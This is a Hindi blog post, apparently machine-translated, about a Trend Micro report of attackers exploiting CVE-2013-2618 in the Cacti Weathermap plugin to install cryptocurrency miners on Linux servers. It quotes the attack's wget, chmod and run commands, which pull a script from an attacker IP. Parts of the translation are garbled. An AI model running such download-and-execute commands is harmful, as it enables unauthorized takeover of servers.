5-वर्षीय लिनक्स दोष हमलावरों को क्रिप्टोकरेंसी को खदान करने की अनुमति देता है

इस से क्रिप्टोकरेंसी माइनर दूरस्थ कंप्यूटर के उपयोग के साथ प्राधिकरण के बिना इन के मालिकों का एक चलन बन रहा है। इस प्रकार की स्थिति के बारे में ब्लॉग पर मैंने पहले ही कुछ अवसरों पर इस बारे में बात की थी।

और यह है कि यह पहले से ही उस क्रिप्टोकरेंसी के नियंत्रण से पूरी तरह से बाहर हो गया है काफी महत्वपूर्ण स्थान और मूल्य ले लिया है, अपनी सुरक्षा का उल्लंघन करने वाले कंप्यूटर तक पहुंचने के लिए पर्याप्त ज्ञान रखने वाले लोगों ने एक मौद्रिक लाभ प्राप्त करने के लिए महत्वपूर्ण जानकारी या बैंक खातों की तलाश में अपना समय बर्बाद कर दिया है।

ऐसा करने के बजाय, वे सबसे आसान काम करने का विकल्प चुनते हैं: इन टीमों पर नियंत्रण रखें और उन्हें एक खनन नेटवर्क में एकजुट करें और अन्य कार्यों के लिए भी करें जो वे आमतौर पर एक बोटनेट के साथ करते हैं।

इस तरह यह आम तौर पर आपको पुनः प्राप्त करने के लिए अधिक होता है, वे केवल उस तात्कालिक धन पर ध्यान केंद्रित कर रहे हैं जो यह उत्पन्न करता है।

बाजार के रुझान की स्मार्ट समझ और क्रिप्टो ट्रेडिंग के उचित ज्ञान के साथ, कोई भी महान लाभ प्राप्त कर सकता है।

क्या लिनक्स वास्तव में एक सुरक्षित प्रणाली है?

हम में से कई लोगों का विचार है कि लिनक्स एक लगभग पूर्ण सुरक्षित ऑपरेटिंग सिस्टम है, वास्तविकता यह है कि इसमें अभी भी कुछ खामियां हैं।

खैर हैकुछ दिन ट्रेंडमाइक्रो ने एक खोज की, जिसमें प्रकट एक नया लिनक्स सिस्टम में दोष, जिसने हैकर्स को खनन क्रिप्टोकरेंसी का लाभ दिया लिनक्स सर्वर और मशीनों का उपयोग करना।

अपने ब्लॉग के माध्यम से एक बयान में उन्होंने निम्नलिखित टिप्पणी की:

घटना की प्रतिक्रिया से संबंधित हमारी निगरानी के माध्यम से, हमने घुसपैठ के प्रयासों का अवलोकन किया जिनके संकेतक हम पिछले क्रिप्टोक्यूरेंसी खनन अभियान के साथ सहसंबंधित करने में सक्षम थे जो जेनकिंसमेयर मैलवेयर का उपयोग करते थे।

अंतर: यह अभियान लिनक्स सर्वरों को लक्षित कर रहा है। यह पुन: उपयोग की गई कमजोरियों का एक क्लासिक मामला है, एक पुरानी सुरक्षा दोष का शोषण करता है जिसका पैच लगभग पांच वर्षों से उपलब्ध है।

अपने विश्लेषण के माध्यम से इस रिलीज में प्रभावित स्थलों की पहचान करने में कामयाब रहे इस असफलता के लिए कि यह मुख्य रूप से जापान, ताइवान, चीन, अमेरिका और भारत को प्रभावित करता है।

हमले का विश्लेषण

विश्लेषण के माध्यम से ट्रेंड माइक्रो स्मार्ट प्रोटेक्शन नेटवर्क द्वारा हमलावरों ने इस दोष का फायदा कैसे उठाया, इस पर थोड़ा विस्तार करें:

इस अभियान के संचालक सीवीई -2013-2618 का शोषण कर रहे थे, कैमापी नेटवर्क वेपरमैप प्लगइन में एक दिनांकित भेद्यता, जो सिस्टम प्रशासक नेटवर्क गतिविधि की कल्पना करने के लिए उपयोग करते हैं।

क्यों वे एक पुरानी सुरक्षा खामी का फायदा उठा रहे हैं: जून 2014 से नेटवर्क वेटरमैप की अब तक केवल दो सार्वजनिक रूप से रिपोर्ट की गई कमजोरियां हैं।

ये हमलावर न केवल एक सुरक्षा दोष का फायदा उठा रहे हैं, जिसके लिए एक शोषण उपलब्ध है, लेकिन यह भी पैच विलंब की आवश्यकता है जो खुले स्रोत उपकरण का उपयोग करने वाले संगठनों में होता है।

मूल रूप से हमला XSS हमले के माध्यम से होता है:

फ़ज़ी पार्ट अटैक टारगेट है, पोर्ट वाला वेब सर्वर।

फ़ाइल /प्लगइन्स/वेदरमैप/कॉन्फ़िगरेशन/conn.php लगातार XSS हमले से उत्पन्न फ़ाइल है / plugins / weathermap / php .

के अलावा Con.php प्रारंभ में, हम एक समान HTTP अनुरोध देखते हैं जिसे '' नामक पृष्ठ पर लागू किया जाता है। ठंडा करने की क्रिया '.

Cryptocurrency खनन कार्यक्रम भेद्यता के माध्यम से वितरित किया जाता है लिनक्स सर्वर के लक्ष्य पर PHP मौसम के नक्शे से

छवि में आप देख सकते हैं कि हमला कैसे उत्पन्न होता है और इसे निम्नानुसार वर्णित किया जाता है:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

यह ऐसा करता है कि फ़ाइल को wget के साथ डाउनलोड करने के लिए संकेत भेजें, जो एक उपयोगिता है जो लगभग सभी लिनक्स वितरण डिफ़ॉल्ट रूप से स्थापित किया गया है

chmod 775 watchd0g.sh

फ़ाइल को निष्पादन योग्य बनाता है

./watchd0g.sh

यह अंततः क्या करता है सर्वर पर चलाने के लिए फ़ाइल मिलती है।

सौभाग्य से, वहाँ पहले से ही एक पैच है ( CVE-2013-2618 ) विफलता के लिए उपलब्ध है और आप इसे डाउनलोड कर सकते हैं से इस लिंक।

Si आप इसके बारे में अधिक जानना चाहते हैं इस विफलता के आप इस लिंक पर जा सकते हैं।

Fuente: Cryptocurrency Miner को PHP Weathermap Vulnerability, Targets Linux Servers के माध्यम से वितरित किया जाता है